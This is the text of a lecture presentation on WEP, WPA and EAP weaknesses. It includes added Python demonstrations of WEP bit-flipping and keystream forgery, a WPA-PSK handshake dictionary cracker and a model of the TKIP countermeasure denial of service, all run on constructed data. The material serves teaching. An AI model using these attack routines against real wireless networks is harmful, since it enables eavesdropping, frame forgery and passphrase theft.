WEP, WPA, and EAP - PowerPoint PPT Presentation
WEP, WPA, and EAP


Drew Kalina


Overview

  • Wired Equivalent Privacy (WEP)

  • Wi-Fi Protected Access (WPA)

  • Extensible Authentication Protocol (EAP)


WEP

  • Encryption method: RC4 (stream cipher), keyed with IV || shared key

  • Key size: 40 bits (a 104-bit variant is also common); the 24-bit IV is prepended to the key and sent in the clear

  • Integrity check: ICV, a CRC-32 of the plaintext (not a cryptographic hash)

  • 802.1X authentication: optional

  • Key distribution: manual (one static key shared by all stations)

WEP Vulnerabilities

  • ICV insecure

    • Based on CRC-32, which is linear: flipping bits in the ciphertext and XORing the matching CRC difference into the encrypted ICV yields a frame that still verifies

    • So message contents can be modified and the ICV adjusted to match, without knowing the key

  • IV reuse attack

    • The IV is only 24 bits, so on a busy network the same IV (and hence the same RC4 keystream) can repeat within hours

    • The IV is sent in plaintext, so reuse is easy to spot; XORing two frames with the same IV cancels the keystream

WEP Vulnerabilities (cont)

  • Known plaintext attack

    • Much TCP/IP traffic has predictable content

    • An attacker can also inject known plaintext, e.g. by sending pings from the Internet to a station behind the access point

    • Ciphertext XOR known plaintext gives N bytes of keystream for that IV

    • Any packet of size up to N can then be forged using that IV

WEP Vulnerabilities (cont)

  • Partial known plaintext

    • Only a portion of the message is known (e.g. the IP header)

    • Recovers M octets of keystream, where M < N

    • The known keystream can be extended from M to N by probing: guess the next keystream byte, send a frame one byte longer, and see whether the access point accepts it

    • Packets can be diverted to the attacker by flipping address bits and fixing the CRC-32, then read in the clear

WEP Vulnerabilities (cont)

  • Authentication forging

    • Shared-key authentication sends the challenge in the clear and the response encrypted, so one captured exchange yields the keystream for that IV

    • The client chooses the IV, so the recovered keystream and IV can be replayed to answer any later challenge

  • Dictionary attacks

    • Many vendors derive the key from a passphrase with a weak generator, so the effective key space is that of the password

  • Real-time decryption

    • Build a dictionary of IVs and their keystreams

    • Only 2^24 IVs exist

    • At 1500 bytes of keystream per IV the whole table fits in about 24 GB of disk space
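The ICV, IV-reuse and known-plaintext attacks above, worked through as an added example that is not part of the presentation: a toy WEP in pure Python with a 40-bit key, bit-flipping of a frame with the ICV patched so it still verifies, keystream recovery from one frame with known content, and forgery and decryption of other frames under the same IV. The key, IV and packet contents are constructed for the demo; the RC4 and CRC-32 pieces are the real algorithms.

```python
import binascii

# Added example, not from the presentation: toy WEP plus the ICV bit-flip and
# keystream-reuse attacks.  Key, IV and plaintexts below are constructed.


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA) of `length` bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian on the wire."""
    return binascii.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, cleartext) || RC4(IV || key) XOR (data || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies, else None."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    data, tag = body[:-4], body[-4:]
    return data if icv(data) == tag else None


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """ICV attack: XOR `delta` into the encrypted data and patch the encrypted
    ICV so the frame still verifies.  CRC-32 is affine over GF(2), so
    crc(M ^ delta) = crc(M) ^ crc(delta) ^ crc(zeros of the same length);
    the attacker needs neither the key nor the plaintext."""
    iv, ct = frame[:3], frame[3:]
    assert len(delta) == len(ct) - 4
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(ct, delta + icv_delta)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: keystream for this IV = ciphertext XOR (data || ICV)."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Reuse a recovered keystream to encrypt an arbitrary frame under the same IV."""
    body = plaintext + icv(plaintext)
    assert len(body) <= len(keystream), "forged frame cannot exceed the recovered keystream"
    return iv + xor(body, keystream[: len(body)])


def demo() -> dict:
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"                       # 24-bit IV, sent in the clear
    victim = b"dst=10.0.0.5 GET /secret"       # constructed plaintext
    frame = wep_encrypt(key, iv, victim)

    # 1. Bit-flipping: change 10.0.0.5 -> 10.0.0.9 without the key.  A naive
    #    flip without the ICV patch is rejected; the patched one is accepted.
    delta = bytearray(len(victim))
    delta[victim.index(b"10.0.0.5") + len(b"10.0.0.")] = ord("5") ^ ord("9")
    naive = wep_decrypt(key, frame[:3] + xor(frame[3:], bytes(delta) + bytes(4)))
    redirected = wep_decrypt(key, flip_bits(frame, bytes(delta)))

    # 2. Known plaintext: a frame whose content the attacker knows (e.g. a ping
    #    they sent from the Internet) yields the keystream for that IV.
    keystream = recover_keystream(frame, victim)

    # 3. Keystream reuse: forge a new frame under the same IV, and decrypt any
    #    other frame the station later sends with it (only 2^24 IVs exist).
    forged = wep_decrypt(key, forge(iv, keystream, b"dst=10.0.0.9 PUT /evil"))
    later = wep_encrypt(key, iv, b"dst=10.0.0.7 cleartext!")
    decrypted = xor(later[3:], keystream)[:-4]

    return {"naive": naive, "redirected": redirected, "forged": forged, "decrypted": decrypted}
```

Everything in `demo()` after the first `wep_encrypt` runs with no access to `key`: the bit-flip only touches ciphertext, and the keystream comes from ciphertext XOR known plaintext. The same keystream decrypts the `later` frame because the station reused the IV.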

WEP summary

  • Weak encryption, compounded by the integrity and key-management problems above

  • If possible, use some other protocol

  • Still better than plaintext


WPA

  • Encryption method: RC4, with per-packet keys mixed by TKIP

  • Key size: 128 bits (temporal key; varies by mode)

  • Integrity check: ICV (kept from WEP) plus the Michael MIC

  • 802.1X authentication: can be required (enterprise mode); a pre-shared key is used otherwise

  • Key distribution: 802.1X/EAP or a pre-shared key, with temporal keys derived in the 4-way handshake and refreshed by TKIP

WPA (cont)

  • Michael generates the MIC (Message Integrity Code)

    • 8 bytes (64 bits), computed with a 64-bit MIC key over the addresses and the data

    • Placed between the data and the ICV

  • TKIP (Temporal Key Integrity Protocol)

    • Negotiates the keys to be used, taking the client's configuration into account

    • Mixes the temporal key with the sender address and a 48-bit sequence counter to produce a fresh RC4 key for every frame; the counter also gives replay protection

    • Gives each client a unique pairwise key instead of one key shared by everyone

WPA Vulnerabilities

  • Birthday attack

    • Collect pairs (M1, D1) with D1 = MIC(M1)

    • The attack succeeds when some Di = D1 with i != 1: a second message the MIC does not distinguish from M1

    • Expected work: about 2^32 attempts (the birthday bound on a 64-bit MIC)

    • If the keys change during the attack, the accumulated forgery is garbage

WPA Vulnerabilities (cont)

  • Differential cryptanalytic attack

    • Michael's output has special structure

    • For message pairs, M = Mi XOR Mj and D = Di XOR Dj are called characteristic differentials

    • After characteristic differentials are obtained, try to find the MIC (learning parts of the key)

    • Work required: about 2^30

    • An optimal attack exists with cost O(2^29)

WPA Vulnerabilities (cont)

  • Temporal Key

    • If RC4 per-packet keys leak

    • The TK and the MIC key can be discovered

    • Messages can then be forged

    • Not a practical attack, O(2^105)

    • Does show susceptibility in parts of WPA

WPA Vulnerabilities (cont)

  • DoS

    • TKIP countermeasures: after a second MIC failure within 60 seconds, the access point drops the association and refuses TKIP traffic for 60 seconds

    • Two forged frames per minute are enough to keep an access point with little network activity shut down

  • PSK

    • Used in the absence of 802.1X; usually one PSK per ESS

    • Anyone who knows the PSK (an insider) can derive another client's pairwise keys from the MAC addresses and nonces captured in that client's 4-way handshake, and so decrypt its traffic or imitate it

    • Vulnerable to offline dictionary attacks by outsiders who capture a handshake, if the passphrase is short
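Both PSK problems above, worked through as an added example that is not part of the presentation: the WPA-PSK derivation from IEEE 802.11i (PBKDF2 for the PMK, the pairwise-key PRF for the PTK, HMAC-MD5 for the WPA/TKIP EAPOL-Key MIC) is used first by an insider who knows the PSK and derives another client's keys from a sniffed handshake, then by an outsider running an offline dictionary attack against the same capture. The SSID, passphrase, MAC addresses, nonces and EAPOL frame bytes are constructed; the derivation functions follow the standard.

```python
import hashlib
import hmac

# Added example, not from the presentation.  SSID, passphrase, addresses,
# nonces and the EAPOL frame are constructed; the key derivation is 802.11i's.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (512 bits for TKIP) from the PMK and the values that cross the air in
    the clear during the 4-way handshake: both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def split_ptk(ptk: bytes):
    """KCK (EAPOL MIC key), KEK (key-wrap key), TK (temporal key that feeds TKIP/RC4)."""
    return ptk[0:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA/TKIP EAPOL-Key MIC (key descriptor version 1): HMAC-MD5 with the KCK
    over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_frame, mic, wordlist):
    """Offline dictionary attack: everything except the passphrase is in the capture,
    so each candidate costs one PBKDF2 (4096 HMAC-SHA1) plus a PRF and an HMAC-MD5."""
    for candidate in wordlist:
        kck, _, _ = split_ptk(derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce))
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), mic):
            return candidate
    return None


# Constructed "capture" of another client's 4-way handshake.
SSID = "corp-wifi"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = b"constructed EAPOL-Key message 2, MIC field zeroed: " + SNONCE


def scenario() -> dict:
    real_passphrase = "summer2004"   # constructed; the shared PSK of the ESS

    # The victim client and the AP derive their PTK; message 2 carries a MIC under the KCK.
    victim_ptk = derive_ptk(pmk_from_passphrase(real_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    kck, _, tk = split_ptk(victim_ptk)
    captured_mic = eapol_mic(kck, EAPOL_MSG2)

    # Insider: knows the PSK, sniffs the victim's handshake (MACs + nonces are in
    # the clear) and derives the identical PTK, hence the TK protecting that traffic.
    insider_ptk = derive_ptk(pmk_from_passphrase(real_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)

    # Outsider: has only the capture and a wordlist.
    wordlist = ["password", "letmein", "corp-wifi", "summer2004", "Tr0ub4dor&3"]
    recovered = crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, captured_mic, wordlist)

    return {"insider_matches": insider_ptk == victim_ptk, "tk": tk, "recovered": recovered}
```

The 4096-iteration PBKDF2 is the only per-guess cost, which is why a short or dictionary passphrase falls to an offline attack while a long random one does not; nothing in the capture rate-limits the attacker.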

WPA summary

  • Much better than WEP (especially with 802.1X)

  • WPA2 is better still, using AES-CCMP

  • There are still vulnerabilities

  • Many WEP devices are upgradeable to WPA by firmware, since TKIP keeps RC4 (not to WPA2, which needs AES hardware)

Suggestions for WPA

  • Rekey security associations after failures

  • Lower or eliminate the timeouts after detecting forged packets

    • With the current 60-second timeout the forgery attacks above would take 1000+ years
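The Michael MIC from the WPA slides and the countermeasure timer behind the DoS and the timeout suggestion, as an added example that is not part of the presentation: a Python implementation of Michael as specified in IEEE 802.11i (checked against the standard's all-zero-key, empty-message test vector), the TKIP framing it is computed over, and a small receiver model of the countermeasure rule with the hold-off time as a parameter so the effect of shortening it can be seen. The MIC key, addresses and frames are constructed. One caveat the model skips: in real TKIP a MIC failure is only counted after the frame has decrypted with a valid ICV and passed the replay check, so the attacker's forged frames are assumed here to have got that far.

```python
# Added example, not from the presentation: Michael (IEEE 802.11i) and a model of
# the TKIP countermeasure timer.  Key, addresses and frames are constructed.

MASK32 = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK32


def _xswap(x):
    """Swap the two bytes within each 16-bit half of a 32-bit word."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _block(l, r):
    """Michael's round function b(L, R)."""
    r ^= _rol(l, 17)
    l = (l + r) & MASK32
    r ^= _xswap(l)
    l = (l + r) & MASK32
    r ^= _rol(l, 3)
    l = (l + r) & MASK32
    r ^= _ror(l, 2)
    l = (l + r) & MASK32
    return l, r


def michael(key: bytes, msg: bytes) -> bytes:
    """Michael MIC: 64-bit key, 64-bit tag.  Pad with 0x5a and 4..7 zero bytes to a
    multiple of 4, then absorb one 32-bit little-endian word per round."""
    assert len(key) == 8
    l = int.from_bytes(key[:4], "little")
    r = int.from_bytes(key[4:], "little")
    padded = msg + b"\x5a" + bytes(4 + (3 - len(msg) % 4))
    for i in range(0, len(padded), 4):
        l ^= int.from_bytes(padded[i:i + 4], "little")
        l, r = _block(l, r)
    return l.to_bytes(4, "little") + r.to_bytes(4, "little")


def tkip_mic(mic_key, da, sa, priority, msdu):
    """TKIP computes Michael over DA || SA || priority || 3 zero bytes || MSDU; the
    8-byte result is appended to the data, ahead of the (separate) CRC-32 ICV."""
    return michael(mic_key, da + sa + bytes([priority, 0, 0, 0]) + msdu)


class TkipReceiver:
    """802.11i countermeasure rule: a second MIC failure within `window` seconds of
    the first tears down the association and refuses TKIP frames for `holdoff`
    seconds.  `holdoff` is a parameter so the 'lower or eliminate the timeout'
    suggestion can be tried (0.0 removes the hold-off; rekeying is not modelled)."""

    def __init__(self, mic_key, window=60.0, holdoff=60.0):
        self.mic_key = mic_key
        self.window, self.holdoff = window, holdoff
        self.last_failure = None
        self.disabled_until = 0.0

    def receive(self, now, da, sa, priority, msdu, mic):
        if now < self.disabled_until:
            return "dropped (countermeasures active)"
        if tkip_mic(self.mic_key, da, sa, priority, msdu) == mic:
            return "accepted"
        if self.last_failure is not None and now - self.last_failure < self.window:
            self.last_failure = None
            self.disabled_until = now + self.holdoff
            return "MIC failure -> countermeasures for %gs" % self.holdoff
        self.last_failure = now
        return "MIC failure (first in window)"


def demo(holdoff=60.0):
    """Two forged frames a second apart shut the receiver for `holdoff` seconds."""
    mic_key = bytes.fromhex("0123456789abcdef")            # constructed MIC key
    ap, sta = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    rx = TkipReceiver(mic_key, holdoff=holdoff)
    good = lambda t, data: rx.receive(t, sta, ap, 0, data, tkip_mic(mic_key, sta, ap, 0, data))
    bad = lambda t, data: rx.receive(t, sta, ap, 0, data, bytes(8))   # attacker has no MIC key
    return [
        good(0.0, b"legit frame 1"),
        bad(1.0, b"forged 1"),
        bad(2.0, b"forged 2"),              # second failure within 60 s
        good(30.0, b"legit frame 2"),       # lost while countermeasures are active
        good(2.0 + holdoff, b"legit frame 3"),
    ]
```

With the default `holdoff=60.0` the legitimate frame at t=30 is dropped; with `holdoff=0.0` it is accepted, which is the whole effect of the timeout suggestion on this attack.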


EAP

  • A transport and framework for authentication protocols, not an authentication method in itself

  • Works with many authentication back ends, such as RADIUS servers and Kerberos

  • Uses a variety of transport methods

EAP Transport methods



  • PEAP (Protected EAP): runs the inner authentication method inside a TLS tunnel

  • LEAP (Lightweight EAP, Cisco): MS-CHAP challenge/response, no tunnel

Vulnerabilities in LEAP

  • Dictionary attack: the MS-CHAP challenge and response cross the air unprotected, so a captured exchange can be checked offline against a wordlist

  • Early versions of MS-CHAP are weak, which makes that offline check cheap